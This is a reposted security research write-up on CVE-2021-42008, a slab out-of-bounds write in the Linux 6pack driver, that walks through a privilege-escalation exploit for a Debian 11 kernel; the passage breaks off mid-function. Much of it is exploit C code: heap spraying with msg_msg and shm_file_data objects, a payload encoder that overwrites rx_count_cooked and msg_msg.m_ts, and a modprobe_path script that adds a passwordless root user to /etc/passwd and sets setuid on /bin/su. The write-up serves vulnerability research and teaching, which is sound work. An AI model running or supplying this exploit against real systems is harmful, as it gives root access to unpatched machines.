[CVE-2021-42008] Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver

Nytro · December 5, 2021

1 DECEMBER 2021/RESEARCH

[CVE-2021-42008] Exploiting A 16-Year-Old Vulnerability In The Linux 6pack Driver

CVE-2021-42008 is a Slab-Out-Of-Bounds Write vulnerability in the Linux 6pack driver caused by a missing size validation check in the decode_data function. A malicious input from a process with CAP_NET_ADMIN capability can lead to an overflow in the cooked_buf field of the sixpack structure, resulting in kernel memory corruption. This, if properly exploited, can lead to root access. In this article, after analyzing the vulnerability, we will exploit it using the techniques FizzBuzz101 and me presented in our recent articles Fire Of Salvation and Wall Of Perdition, bypassing all modern kernel protections, then, we will evaluate other approaches to perform privilege escalation.

Overview

6pack is a transmission protocol for data exchange between a PC and a TNC (Terminal Node Controller) over a serial line. It is used as an alternative to the KISS protocol for networking over AX.25. AX.25 is a data link layer protocol extensively used on amateur packet radio networks (and by some satellites, for example 3CAT2).

The vulnerability we are going to exploit, was introduced by commit 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 with the introduction of the 6pack driver back in 2005. It was found by Syzbot and recently fixed by commit 19d1532a187669ce86d5a2696eb7275310070793. Every kernel version before 5.13.13 that has not been patched, is affected.

As we mentioned in the introduction, the vulnerability is caused by a missing size validation check in the decode_data() function. A malicious input received over the sixpack channel from a process with CAP_NET_ADMIN capability, can cause the decode_data() function to be called multiple times by sixpack_decode(). The malicious input is subsequently decoded and stored into a buffer, cooked_buf, inside the sixpack structure. The variable rx_count_cooked is used as index in cooked_buf, it basically determines the offset at which to write a decoded byte. The problem is that if decode_data() is called many times, the rx_count_cooked variable is incremented over and over, until it exceeds the size of cooked_buf, which can contain a maximum of 400 bytes. This can result in a a Slab-Out-Of-Bounds Write vulnerability, which if properly exploited, can lead to root access.

To exploit the vulnerability, we are going to target one of the latest Debian 11 versions. You can download it from here. The exploit is designed and tested for kernel 5.10.0-8-amd64. All modern protections, such as KASLR, SMEP, SMAP, PTI, CONFIG_SLAB_FREELIST_RANDOM, CONFIG_SLAB_FREELIST_HARDENED, CONFIG_HARDENED_USERCOPY etc. are enabled.

Analyzing The Vulnerable Driver

In modern Linux distributions, 6pack is usually compiled as a Loadable Kernel Module. The module can be loaded into kernel by setting the line discipline of a tty to N_6PACK. To do so, we can simply create a ptmx/pts pair, respectively the master side and the slave side of a pty and set the line discipline of the slave to N_6PACK:

#define N_6PACK 7

int open_ptmx(void)
{
    int ptmx;

    ptmx = getpt();

    if (ptmx < 0)
    {
        perror("[X] open_ptmx()");
        exit(1);
    }

    grantpt(ptmx);
    unlockpt(ptmx);

    return ptmx;
}


int open_pts(int fd)
{
    int pts;

    pts = open(ptsname(fd), 0, 0);

    if (pts < 0)
    {
        perror("[X] open_pts()");
        exit(1);
    }

    return pts;
}


void set_line_discipline(int fd, int ldisc)
{
    if (ioctl(fd, TIOCSETD, &ldisc) < 0) // [2]
    {
        perror("[X] ioctl() TIOCSETD");
        exit(1);
    }
}


int init_sixpack()
{
    int ptmx, pts;

    ptmx = open_ptmx();
    pts = open_pts(ptmx);

    set_line_discipline(pts, N_6PACK); // [1]

    return ptmx;
}

As we can see from the code above, after opening a ptmx and the respective slave side, we set the line discipline of the pts to N_6PACK [1] using the function set_line_discipline() which is nothing more than a wrapper for ioctl(fd, TIOCSETD, &ldisc) [2].

Line discipline, also known as LDISC, acts as an intermediate level between a character device and a pseudo terminal (or real hardware), determining the semantics associated with the device. For example, the line discipline is responsible for the association of a special character like ^C entered by the user in a terminal pressing CTRL+C, to a specific signal, SIGINT in this case. To learn more about tty, pty, ptmx/pts and ldsc I recommend you to read The TTY demystified.

Once we set the pts line discipline to N_6PACK, the 6pack driver is initialized by sixpack_init_driver():

static int __init sixpack_init_driver(void)
{
	int status;

	printk(msg_banner);

	/* Register the provided line protocol discipline */
	if ((status = tty_register_ldisc(N_6PACK, &sp_ldisc)) != 0) // [1]
		printk(msg_regfail, status);

	return status;
}

and tty_register_ldisc() is called by the kernel to register the new line discipline [1]. The second argument, sp_ldisc, is defined as:

static struct tty_ldisc_ops sp_ldisc = {
	.owner		= THIS_MODULE,
	.magic		= TTY_LDISC_MAGIC,
	.name		= "6pack",
	.open		= sixpack_open,
	.close		= sixpack_close,
	.ioctl		= sixpack_ioctl,
	.receive_buf	= sixpack_receive_buf,
	.write_wakeup	= sixpack_write_wakeup,
};

Afterwards the sixpack channel is opened by sixpack_open():

static int sixpack_open(struct tty_struct *tty)
{
	char *rbuff = NULL, *xbuff = NULL;
	struct net_device *dev;
	struct sixpack *sp;
	unsigned long len;
	int err = 0;

	if (!capable(CAP_NET_ADMIN)) // [1]
		return -EPERM;
	if (tty->ops->write == NULL)
		return -EOPNOTSUPP;

	dev = alloc_netdev(sizeof(struct sixpack), "sp%d", NET_NAME_UNKNOWN,
			   sp_setup); // [2]
	if (!dev) {
		err = -ENOMEM;
		goto out;
	}

	sp = netdev_priv(dev); // [3]
	sp->dev = dev;

	[...]

	sp->status      = 1; // [4]

	[...]

	timer_setup(&sp->tx_t, sp_xmit_on_air, 0);
	timer_setup(&sp->resync_t, resync_tnc, 0); // [5]

	[...]

	tty->disc_data = sp; // [6]
	tty->receive_room = 65536;

	/* Now we're ready to register. */
	err = register_netdev(dev);
	if (err)
		goto out_free;

	tnc_init(sp); // [7]

	return 0;

	[...]
}

From the source code above, we can see that only a process with CAP_NET_ADMIN capability is allowed to interact with the 6pack driver [1]. Fortunately, this makes the vulnerability not so easily exploitable in the wild. Then, a net device is allocated using alloc_netdev() which is a macro for alloc_netdev_mqs() [2]:

[...]

alloc_size = sizeof(struct net_device); // 0x940 bytes
if (sizeof_priv) {
	/* ensure 32-byte alignment of private area */
	alloc_size = ALIGN(alloc_size, NETDEV_ALIGN);
	alloc_size += sizeof_priv; // 0x270 bytes
}
/* ensure 32-byte alignment of whole construct */
alloc_size += NETDEV_ALIGN - 1;

p = kvzalloc(alloc_size, GFP_KERNEL | __GFP_RETRY_MAYFAIL);
if (!p)
	return NULL;

dev = PTR_ALIGN(p, NETDEV_ALIGN);

[...]

As we can see from alloc_netdev_mqs() source code, first it calculates the size of a net_device structure, 0x940 bytes in our case, and then it adds to it value of sizeof_priv, which corresponds to the size of a sixpack structure, 0x270 bytes in our case. After alignment, this will result in an allocation of 0xbcf bytes, that will end up in kmalloc-4096.

Back to sixpack_open(), right after the call to alloc_netdev(), netdev_priv() is called: it sets the location of the sixpack structure inside the private data region of the previously allocated net device [3]. Finally, after setting the status field of the sixpack structure to 1 [4] and after setting up two timers (the function called when the second time expires, resync_tnc(), will be extremely important in the exploitation phase) [5], the tty line is linked to the sixpack channel [6], the net device is registered, and tnc_init() is called [7]:

static inline int tnc_init(struct sixpack *sp)
{
	[...]

	mod_timer(&sp->resync_t, jiffies + SIXP_RESYNC_TIMEOUT); // [1]

	return 0;
}

Among other things, tnc_init() sets the expiration time of the sp->resync_t timer to jiffies + SIXP_RESYNC_TIMEOUT [1]. In the Linux Kernel, jiffies is a global variable that stores the number of ticks occurred since the system boot-up. The value of this variable is incremented by one for each timer interrupt. In one second, there are HZ ticks (the value of HZ is determined by CONFIG_HZ). Since we know that HZ = number of ticks/sec and jiffies = number of ticks, we can simply convert jiffies to seconds sec = jiffies/HZ and seconds to jiffies jiffies = sec*HZ.

This is exactly what the Linux Kernel does to determine when a timer expires. For example, a timer that expires in 10 seconds from now can be represented in jiffies using jiffies + (10*HZ).

In our case, the timer is set to jiffies + SIXP_RESYNC_TIMEOUT. SIXP_RESYNC_TIMEOUT is equal to 5*HZ. So it means that once we initialize the sixpack channel, the timer will expire after 5 seconds and the resync_tnc() function will be called. We will analyze this function during the exploitation phase.

Reaching The Vulnerable Function

Now that we can communicate with the sixpack driver, when we write to the ptmx, sixpack_receive_buf() is called, which in turn calls sixpack_decode():

static void sixpack_decode(struct sixpack *sp, const unsigned char *pre_rbuff, int count)
{
	unsigned char inbyte;
	int count1;

	for (count1 = 0; count1 < count; count1++) {
		inbyte = pre_rbuff[count1]; // [1]
		if (inbyte == SIXP_FOUND_TNC) {
			tnc_set_sync_state(sp, TNC_IN_SYNC);
			del_timer(&sp->resync_t);
		}
		if ((inbyte & SIXP_PRIO_CMD_MASK) != 0) // [2]
			decode_prio_command(sp, inbyte);
		else if ((inbyte & SIXP_STD_CMD_MASK) != 0) // [3]
			decode_std_command(sp, inbyte);
		else if ((sp->status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK) // [4]
			decode_data(sp, inbyte);
	}
}

The various macros are defined in 6pack.c:

#define SIXP_FOUND_TNC		0xe9
#define SIXP_PRIO_CMD_MASK	0x80
#define SIXP_PRIO_DATA_MASK	0x38
#define SIXP_RX_DCD_MASK	0x18
#define SIXP_DCD_MASK		0x08

sixpack_decode() will loop through the buffer we sent over the sixpack channel, now stored in pre_rbuff [1], and based on the value of each byte (inbyte), it will take different paths. To reach the vulnerable function, decode_data(), we must force sixpack_decode() to take the last path [4] and to do so, we need to satisfy multiple conditions:

A. inbyte & SIXP_PRIO_CMD_MASK must be zero, otherwise decode_prio_command() will be called instead of decode_data() [2].

B. inbyte & SIXP_STD_CMD_MASK must be zero, otherwise decode_std_command() will be called instead of decode_data() [3].

C. sp->status & SIXP_RX_DCD_MASK must be equal to SIXP_RX_DCD_MASK [4].

Since we control the value of each byte in our buffer, the first two conditions can be easily satisfied. The most complex one to satisfy is C: sp->status corresponds to the status field of the sixpack structure associated with our tty. As we have seen before, when a sixpack structure is initialized by sixpack_open(), the status variable is set to 1. Although we have no direct control over this variable, we can still indirectly modify it by taking the decode_prio_command() path [2]:

static void decode_prio_command(struct sixpack *sp, unsigned char cmd)
{
	int actual;

	if ((cmd & SIXP_PRIO_DATA_MASK) != 0) { // [1]

		if (((sp->status & SIXP_DCD_MASK) == 0) &&
			((cmd & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK)) { // [2]
				if (sp->status != 1)
					printk(KERN_DEBUG "6pack: protocol violation\n");
				else
					sp->status = 0;
				cmd &= ~SIXP_RX_DCD_MASK; // [3]
		}
		sp->status = cmd & SIXP_PRIO_DATA_MASK; // [4]
	} else { /* output watchdog char if idle */

              [...]

        }

        [...]
}

When decode_prio_command() is called, if we satisfy the first check [1], we can get control over sp->status thanks to the line sp->status = cmd & SIXP_PRIO_DATA_MASK [4], which is exactly what we need since we control the value of cmd.

Now we have a problem: if the second check is satisfied [2], the SIXP_RX_DCD_MASK bits are zeroed out from our cmd variable by the line cmd &= ~SIXP_RX_DCD_MASK [3], but since we need to satisfy condition C to reach the vulnerable function decode_data(), the second part of the second check (cmd & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK [2] will be inevitably satisfied and the same applies to the first part of the check (sp->status & SIXP_DCD_MASK) == 0 since when we call decode_prio_command() for the first time, sp->status is equal to 1.

Fortunately, we can easily work around the problem by calling decode_prio_command() two times: The first time, we set sp->status to a value for which when we call decode_prio_command() again, the first part of the second check (sp->status & SIXP_DCD_MASK) == 0 [2] will not be satisfied. This way, calling decode_prio_command() again with a specific value as input, we will be able to skip the line cmd &= ~SIXP_RX_DCD_MASK [3] and set sp->status to a value that can satisfy condition C.

The following python script will compute the correct bytes to use as input to achieve our goal:

print("[*] First call to decode_prio_command():")
for byte in range(0x100):
	x = byte
	if (x & SIXP_PRIO_CMD_MASK) != 0: # To call decode_prio_command()
		if (x & SIXP_PRIO_DATA_MASK) != 0: # [1] in decode_prio_command()
			if (x & SIXP_RX_DCD_MASK) != SIXP_RX_DCD_MASK: # [2] in decode_prio_command()
				x = x & SIXP_PRIO_DATA_MASK # [3] in decode_prio_command()
				print(f"Input: {hex(byte)} => sp->status = {hex(x)}\n")
				break

print("[*] Second call to decode_prio_command():")
for byte in range(0x100):
	x = byte
	if (x & SIXP_PRIO_CMD_MASK) != 0: # To call decode_prio_command()
		if (x & SIXP_PRIO_DATA_MASK) != 0: # [1] in decode_prio_command()
			if (x & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK: # To reach decode_data()
				x = x & SIXP_PRIO_DATA_MASK # [3] in decode_prio_command()
				print(f"Input: {hex(byte)} => sp->status = {hex(x)}")
				break

Executing the script above we will get the following result:

[*] First call to decode_prio_command():
Input: 0x88 => s->status = 0x8

[*] Second call to decode_prio_command():
Input: 0x98 => s->status = 0x18

It means that if we call decode_prio_command() the first time using 0x88 as input, sp->status will be set to 0x8, then, calling the function again using 0x98 as input, the second check will not be satisfied [2] because sp->status will be equal to 8 and (8 & SIXP_DCD_MASK) != 0, and we will be able skip the line cmd &= ~SIXP_RX_DCD_MASK [3] and set sp->status to 0x18 thanks to the line sp->status = cmd & SIXP_PRIO_DATA_MASK [4].

At this point we can satisfy condition C, (sp->status & SIXP_RX_DCD_MASK) == SIXP_RX_DCD_MASK, in sixpack_decode(), and reach the vulnerable function decode_data(). Let’s proceed examining its source code:

static void decode_data(struct sixpack *sp, unsigned char inbyte)
{
	unsigned char *buf;

	if (sp->rx_count != 3) {
		sp->raw_buf[sp->rx_count++] = inbyte; // [1]

		return;
	}

	buf = sp->raw_buf; // [2]
	sp->cooked_buf[sp->rx_count_cooked++] =
		buf[0] | ((buf[1] << 2) & 0xc0);
	sp->cooked_buf[sp->rx_count_cooked++] =
		(buf[1] & 0x0f) | ((buf[2] << 2) & 0xf0);
	sp->cooked_buf[sp->rx_count_cooked++] =
		(buf[2] & 0x03) | (inbyte << 2);
	sp->rx_count = 0;
}

For our discussion, we also need to take into account the following fields of the sixpack structure:

struct sixpack {

	[...]

	unsigned char		raw_buf[4];
	unsigned char		cooked_buf[400];

	unsigned int		rx_count;
	unsigned int		rx_count_cooked;

	[...]

	unsigned char		status;

	[...]
};

Every time decode_data() is called, one byte is copied from our buffer to sp->raw_buf [1]. When sp->raw_buf contains three bytes and decode_data() is called again, these three bytes are decoded and copied from sp->raw_buf to another buffer, sp->cooked_buf [2]. As we can see from the sixpack structure above, this buffer can contain a maximum of 400 bytes. The variable sp->rx_count_cooked is used as index in sp->cooked_buf and it is incremented after each byte is written into it.

From an attacker prospective, knowing that your payload will pass through this function, is not very reassuring. Luckily we can reuse some parts of the encode_sixpack() function in our exploit to encode our malicious input, this way, once received by sixpack_decode() our payload will be decoded by decode_data() and we will be able to control values in memory. Here is the encode_sixpack() part we are interested in:

static int encode_sixpack(unsigned char *tx_buf, unsigned char *tx_buf_raw,
	int length, unsigned char tx_delay)
{
	[...]

	for (count = 0; count <= length; count++) {
		if ((count % 3) == 0) {
			tx_buf_raw[raw_count++] = (buf[count] & 0x3f);
			tx_buf_raw[raw_count] = ((buf[count] >> 2) & 0x30);
		} else if ((count % 3) == 1) {
			tx_buf_raw[raw_count++] |= (buf[count] & 0x0f);
			tx_buf_raw[raw_count] =	((buf[count] >> 2) & 0x3c);
		} else {
			tx_buf_raw[raw_count++] |= (buf[count] & 0x03);
			tx_buf_raw[raw_count++] = (buf[count] >> 2);
		}
	}

	[...]

	return raw_count;
}

Now that we know how to reach the vulnerable function, we can finally start planning our exploit!

The Exploitation Plan

The first thing to consider is the layout of the sixpack structure in memory. Let’s take a look to its source code again:

struct sixpack {

	[...]

	unsigned char		raw_buf[4];
	unsigned char		cooked_buf[400]; // [1]

	unsigned int		rx_count; // [2]
	unsigned int		rx_count_cooked; // [3]

	[...]
};

As we can see, if we manage to overflow the cooked_buf buffer [1], we will inevitably overwrite the rx_count variable [2] and the rx_count_cooked variable [3] in memory. Here is a visual representation:

Since we know that rx_count_cooked is used as index inside cooked_buf by decode_data(), if we do the math correctly, we can use the overflow to set it to a large value, this way we should be able to trick decode_data() into continuing to write into the next object in memory.

Now, assuming we can achieve this goal, we need an object that we can spray in kmalloc-4096, and once corrupted by our Out-Of-Bounds Write primitive, can give us powerful primitives, such as arbitrary read and arbitrary write. At this point, if you have read my latest article, you already know that msg_msg is exactly what we need:

struct msg_msg {
	struct list_head m_list;
	long m_type;
	size_t m_ts; // [1]
	struct msg_msgseg *next; // [2]
	void *security;
	/* the actual message follows immediately */
};

In our recent articles, Fire Of Salvation and Wall Of Perdition, FizzBuzz101 and me, have extensively discussed how to utilize msg_msg objects to achieve arbitrary read and arbitrary write in the Linux Kernel. Before continuing, I recommend you to read these articles to better understand how this object can be exploited. I will continue this discussion assuming you already know how msg_msg objects can be used in kernel exploitation.

If we manage to get a msg_msg object allocated right after the sixpack structure, and the respective segment allocated in kmalloc-32, we can corrupt the m_ts field of the message (which determines its size) with our Out-Of-Bounds Write primitive, setting it to a large value. This way, using msgrcv() in user space to read the message, we should be able to obtain a powerful Out-Of-Bounds Read primitive in kmalloc-32, get a memory leak and bypass KASLR.

We can do something similar to achieve an arbitrary write primitive. We can spray many msg_msg objects in kmalloc-4096 and their respective segments in kmalloc-32, then for each object we hang the call to copy_from_user() in load_msg() using userfaultfd (there are alternatives to userfaultfd, we will discuss them in the Conclusion section). Afterwards, once one of these messages is allocated right after our sixpack structure, we corrupt its next pointer, setting it to the address where we want to write. In our exploit, we will use modprobe_path, but there are many other valid targets, for example the cred structure of the current task, as we have done with Wall Of Perdition. Once we release the copy_from_user() calls, we should be able to replace the modprobe_path string (set by default to “/sbin/modprobe”) with the path of a binary controlled by us, and trick the kernel into executing the malicious program that will give us root privileges.

At this point, with this plan in mind, we are ready to start writing our exploit!

The Exploit

First of all we need to do some calculations to get the distance between sp->cooked_buf and sp->rx_count_cooked, and the distance between sp->cooked_buf and the next object in memory. In our case, the address of sp->rx_count_cooked corresponds to sp->cooked_buf[0x194] and the address of the next object in memory corresponds to sp->cooked_buf[0x688]. Since we know that sp->rx_count_cooked is used as index inside sp->cooked_buf , if we want to write to the next object in memory, we need to set its value to x, where x >= 0x688. The problem seems straightforward to solve, but we need to take in consideration the effect of GCC optimizations on the vulnerable function decode_data():

static void decode_data(struct sixpack *sp, unsigned char inbyte)
{
	unsigned char *buf;

        [...]

	buf = sp->raw_buf;
	sp->cooked_buf[sp->rx_count_cooked++] =
		buf[0] | ((buf[1] << 2) & 0xc0);
	sp->cooked_buf[sp->rx_count_cooked++] =
		(buf[1] & 0x0f) | ((buf[2] << 2) & 0xf0);
	sp->cooked_buf[sp->rx_count_cooked++] =
		(buf[2] & 0x03) | (inbyte << 2);
	sp->rx_count = 0;
}

decode_data + 00:        nop    DWORD PTR [rax+rax*1+0x0]
decode_data + 05:        movzx  r8d,BYTE PTR [rdi+0x35] // r8d = sp->raw_buf[1]
decode_data + 10: [1]    mov    eax,DWORD PTR [rdi+0x1cc] // eax = sp->rx_count_cooked
decode_data + 16:        shl    esi,0x2
decode_data + 19:        lea    edx,[r8*4+0x0]
decode_data + 27: [2]    mov    rcx,rax // rcx = sp->rx_count_cooked
decode_data + 30:        lea    r9d,[rax+0x1] // r9d = sp->rx_count_cooked + 1
decode_data + 34:        and    r8d,0xf
decode_data + 38:        and    edx,0xffffffc0
decode_data + 41:        or     dl,BYTE PTR [rdi+0x34] // dl or sp->raw_buf[0]
decode_data + 44: [3]    mov    BYTE PTR [rdi+rax*1+0x38],dl // Write first decoded byte in sp->cooked_buf
decode_data + 48:        movzx  edx,BYTE PTR [rdi+0x36] // eax = sp->raw_buf[2]
decode_data + 52:        lea    eax,[rdx*4+0x0]
decode_data + 59:        and    edx,0x3
decode_data + 62:        and    eax,0xfffffff0
decode_data + 65:        or     esi,edx
decode_data + 67:        or     eax,r8d
decode_data + 70: [4]    mov    BYTE PTR [rdi+r9*1+0x38],al // Write second decoded byte in sp->cooked_buf
decode_data + 75:        lea    eax,[rcx+0x3] // eax = sp->rx_count_cooked + 3
decode_data + 78: [5]    mov    DWORD PTR [rdi+0x1cc],eax //  sp->rx_count_cooked = sp->rx_count_cooked + 3
decode_data + 84:        lea    eax,[rcx+0x2] // eax = sp->rx_count_cooked + 2
decode_data + 87: [6]    mov    BYTE PTR [rdi+rax*1+0x38],sil // Write third decoded byte in sp->cooked_buf
decode_data + 92:        mov    DWORD PTR [rdi+0x1c8],0x0 // sp->rx_count = 0
decode_data + 102:       ret

The first important thing to note is that predictably, when decode_data() is called, and sp->raw_buf contains 3 bytes, GCC optimized the access to sp->rx_count_cooked, so instead of accessing its value multiple times during the write procedure, it is stored in EAX [1] and then it moved it to RCX [2] at the beginning of the function.

The second important thing is that instead of three consecutive write operations in sp->cooked_buf, before writing the third decoded byte [6], the value of sp->rx_count_cooked is updated with its previously stored [1] [2] value + 3 [5]. This optimization makes things harder, because if we manage to overwrite the first two bytes of sp->rx_count_cooked thanks to the instructions [3] and [4], before overwriting the third byte [6], its value will be updated by instruction [5].

It means that we need to try to use the third write operation [6] to overwrite the second byte of sp->rx_count_cooked that corresponds to sp->cooked_buf[0x195], for example making it 0x06XX instead of 0x01XX.

Since decode_data() is writing 3 bytes at time, starting from index 0 into sp->cooked_buf, each time decode_data() is called, the third byte will be written at index 0x2, 0x5, 0x8, …, 0x191, 0x194 and so on. Basically when sp->rx_count_cooked is 0x192 and decode_data() is called again, the third write operation will be performed over sp->cooked_buf[0x194], but we need to overwrite sp->cooked_buf[0x195] with the third decoded byte! We can solve the problem misaligning the writing frame by setting the first byte of sp->rx_count_cooked to 0x90, so it will become 0x190. This way, after two more calls to decode_data() the third write operation will be performed over sp->cooked_buf[0x195].

Each time decode_data() is called, we basically have a pattern of three operations:

First, when sp->rx_count_cooked is equal to 0x192 and decode_data() is called again, it writes the first two bytes with instruction [3] and [4] respectively at sp->cooked_buf[0x192] and sp->cooked_buf[0x193].
Then instruction [5] updates sp->rx_count_cooked with its previously stored value + 3: 0x192 + 3: 0x195.
And finally the third write operation [6] overwrites the first byte of sp->rx_count_cooked which corresponds to sp->cooked_buf[0x194], making it 0x190.

Here we have the three operations represented visually:

Now sp->rx_count_cooked is equal to 0x190, and we successfully misaligned the writing frame. When decode_data() is called again, we have the same pattern of operations:

Write two bytes inside sp->cooked_buf (this time at sp->cooked_buf[0x190] and sp->cooked_buf[0x191])
Update sp->rx_count_cooked with its previously stored value + 3 (this time 0x190 + 3: 0x193)
Write the third byte (this time at sp->cooked_buf[0x192]😞

And again, a new call to decode_data() will finally set sp->rx_count_cooked to 0x696. The pattern is always the same:

Write two bytes inside sp->cooked_buf (this time at sp->cooked_buf[0x193] and sp->cooked_buf[0x194])
Update sp->rx_count_cooked with its previously stored value + 3 (this time 0x193 + 3: 0x196)
Write the third byte (this time at sp->cooked_buf[0x195]😞

This will trick decode_data() into continuing to write our payload 0x0e bytes inside the next object in memory. At this point we can start writing our exploit:

void prepare_exploit()
{
    system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /tmp/asd");
    system("chmod +x /tmp/asd");
    system("echo '#!/bin/sh' > /tmp/x");
    system("echo 'chmod +s /bin/su' >> /tmp/x"); // Needed for busybox, just in case
    system("echo 'echo \"pwn::0:0:pwn:/root:/bin/sh\" >> /etc/passwd' >> /tmp/x"); // [4]
    system("chmod +x /tmp/x");

    memcpy(buff2 + 0xfc8, "/tmp/x\00", 7);
}


void assign_to_core(int core_id)
{
    cpu_set_t mask;
    pid_t pid;

    pid = getpid();

    printf("[*] Assigning process %d to core %d\n", pid, core_id);

    CPU_ZERO(&mask);
    CPU_SET(core_id, &mask);

    if (sched_setaffinity(getpid(), sizeof(mask), &mask) < 0) // [2]
    {
        perror("[X] sched_setaffinity()");
        exit(1);
    }

    print_affinity();
}

[...]

assign_to_core(0); // [1]
prepare_exploit(); // [3]

[...]

Since we are working in a SMD environment and with the SLUB allocator active slabs are managed per-cpu (see kmem_cache_cpu), we need to make sure to operate always on the same processor to maximize the success rate of our exploit. We can do it restricting the current process to core 0 [1] using sched_setaffinity() [2] which is usable by unprivileged users. Then we call prepare_exploit() to prepare everything we need to abuse modprobe [3] (Check References to learn more about this technique or read my Hotrod writeup). As you can see once executed by the kernel, the program will add a new user with root privileges [4].

void alloc_msg_queue_A(int id)
{
    if ((qid_A[id] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)
    {
        perror("[X] msgget");
        exit(1);
    }
}


void send_msg(int qid, int size, int type, int c)
{
    struct msgbuf
    {
        long mtype;
        char mtext[size - 0x30];
    } msg;

    msg.mtype = type;
    memset(msg.mtext, c, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)
    {
        perror("[X] msgsnd");
        exit(1);
    }
}


void *recv_msg(int qid, size_t size, int type)
{
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, type, IPC_NOWAIT | MSG_COPY | MSG_NOERROR) < 0)
    {
        perror("[X] msgrcv");
        return NULL;
    }

    return memdump;
}


void alloc_shm(int i)
{
    shmid[i] = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600);

    if (shmid[i]  < 0)
    {
        perror("[X] shmget fail");
        exit(1);
    }

    shmaddr[i] = (void *)shmat(shmid[i], NULL, SHM_RDONLY);

    if (shmaddr[i] < 0)
    {
        perror("[X] shmat");
        exit(1);
    }
}

[...]

puts("[*] Spraying shm_file_data in kmalloc-32...");
for (int i = 0; i < 100; i++)
    alloc_shm(shmid[i]); // [1]

puts("[*] Spraying messages in kmalloc-4k...");
for (int i = 0; i < N_MSG; i++)
    alloc_msg_queue_A(i); // [2]

for (int i = 0; i < N_MSG; i++)
    send_msg(qid_A[i], 0x1018, 1, 'A' + i); // [3]

recv_msg(qid_A[0], 0x1018, 0); // [4]
ptmx = init_sixpack(); // [5]

[...]

We can continue spraying many shm_file_data structures in kmalloc-32:

struct shm_file_data {
	int id;
	struct ipc_namespace *ns;
	struct file *file;
	const struct vm_operations_struct *vm_ops;
};

This can be done using shmget() to allocate a shared memory segment and shmat() to attach it to the address space of the calling process. This, later on, will allow us to leak the init_ipc_ns symbol, located in the kernel data section, compute kernel base, and bypass KASLR.

Afterwards, we allocate N_MSG (in our case N_MSG is equal to 7) message queues [2] and then for each queue we send a message of 0x1018 bytes (0xfe8 bytes for message body, and 0x30 for message header) using send_msg() [3] which is a wrapper for msgsnd(). Each iteration will allocate a message in kmalloc-4096 and a segment in kmalloc-32. Then we use recv_msg(), which is a wrapper for msgrcv() to read a message a create a hole in the kernel heap [4]. At this point we can finally initialize the sixpack channel as we have seen in the first section. This will allocate a net_device structure in kmalloc-4096 and a sixpack structure inside its private data region.

All this will probably create the following situation in memory, where the sixpack structure is followed by one of the messages we have just allocated. This message contains a pointer to its respective segment:

It is important to note that we don’t know to which of the 6 queues belongs the message allocated right after the sixpack structure, so I identified its queue with QID #X. We are finally ready to send our malicious payload over the sixpack channel:

uint8_t *sixpack_encode(uint8_t *src)
{
    uint8_t *dest = (uint8_t *)calloc(1, 0x3000);
    uint32_t raw_count = 2; // [8]

    for (int count = 0; count <= PAGE_SIZE; count++)
    {
        if ((count % 3) == 0)
        {
            dest[raw_count++] = (src[count] & 0x3f);
            dest[raw_count] = ((src[count] >> 2) & 0x30);
        }
        else if ((count % 3) == 1)
        {
            dest[raw_count++] |= (src[count] & 0x0f);
            dest[raw_count] =	((src[count] >> 2) & 0x3c);
        }
        else
        {
            dest[raw_count++] |= (src[count] & 0x03);
            dest[raw_count++] = (src[count] >> 2);
        }
    }

    return dest;
}


uint8_t *generate_payload(uint64_t target)
{
    uint8_t *encoded;

    memset(buff, 0, PAGE_SIZE);

    // sp->rx_count_cooked = 0x190
    buff[0x194] = 0x90; // [2]

    // sp->rx_count_cooked = 0x696
    buff[0x19a] = 0x06; // [3]

    // fix upper two bytes of msg_msg.m_list.prev
    buff[0x19b] = 0xff; // [4]
    buff[0x19c] = 0xff;

    // msg_msg.m_ts = 0x1100
    buff[0x1a6] = 0x11; // [5]

    // msg_msg.next = target
    if (target) // [6]
        for (int i = 0; i < sizeof(uint64_t); i++)
            buff[0x1ad + i] = (target >> (8 * i)) & 0xff;

    encoded = sixpack_encode(buff);

    // sp->status = 0x18 (to reach decode_data())
    encoded[0] = 0x88; // [7]
    encoded[1] = 0x98;

    return encoded;
}

[...]

payload = generate_payload(0); // [1]
write(ptmx, payload, LEAK_PAYLOAD_SIZE); // [9]

[...]

We generate and encode our malicious payload calling generate_paylaod() [1]. As we have seen in the previous paragraphs, we misalign the writing frame of the decode_data() function by setting sp->rx_count_cooked to 0x190 [2]. Then we overwrite the second byte of sp->rx_count_cooked with 0x6, making it 0x696 [3]. From this point decode_data() will continue writing at sp->cooked_buf[0x696] and by doing so it will inevitably corrupt the upper two bytes of the msg_msg.m_list.prev pointer. Since we know that the upper two bytes of a heap pointer in kernel space are always 0xffff, we can easly fix it [4]. Then we set msg_msg.m_ts to 0x1100, this will allow us to obtain a powerful Out-Of-Bounds Read primitive calling recv_msg(). For now we don’t need to overwrite msg_msg.next [6], so we can directly encode our buffer [7], and set the first two bytes of the payload respectively 0x88, and 0x98, as we have seen in the previous sections, to reach the vulnerable function. Since we are skipping the first two bytes (used to reach the vulnerable function), we set sp->rx_count to 2 in sixpack_encode() [8].

Once we send our malicious payload over the sixpack channel [9] and it is decoded by sixpack_decode() the situation in memory will be the following:

We have successfully overwritten sp->rx_count_cooked with 0x696 exploiting the buffer overflow in sp->cooked_buf, and tricked decode_data() into continuing to write our malicious payload at sp->cooked_buf[0x696]. By doing so, we successfully overwritten the m_ts field of the message. Here is the result of our Out-Of-Bounds Write primitive showed in GDB:

We can proceed exploiting the Out-Of-Bounds Read:

void close_queue(int qid)
{
    if (msgctl(qid, IPC_RMID, NULL) < 0)
    {
        perror("[X] msgctl()");
        exit(1);
    }
}


int find_message_queue(uint16_t tag)
{
    switch (tag)
    {
        case 0x4141: return 0;
        case 0x4242: return 1;
        case 0x4343: return 2;
        case 0x4444: return 3;
        case 0x4545: return 4;
        case 0x4646: return 5;

        default: return -1;
    }
}


void leak_pointer(void)
{
    uint64_t *leak;

    for (int id = 0; id < N_MSG; id ++)
    {
